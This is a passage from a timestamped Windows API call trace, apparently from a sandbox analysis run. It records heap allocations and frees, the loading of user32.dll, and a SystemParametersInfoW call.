(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0286.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0286.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0286.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0286.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0286.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0286.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0286.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0286.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0286.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0286.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0286.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0286.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0286.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0286.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0286.779] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0286.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0286.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0286.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0286.780] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0286.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0286.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0286.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0286.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.780] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0286.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0286.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0286.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0286.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0286.889] FreeLibrary (hLibModule=0x74f40000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0286.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0286.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0286.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0286.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0286.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0286.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0286.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0286.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0286.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0286.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0286.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0286.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0286.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0286.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0286.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 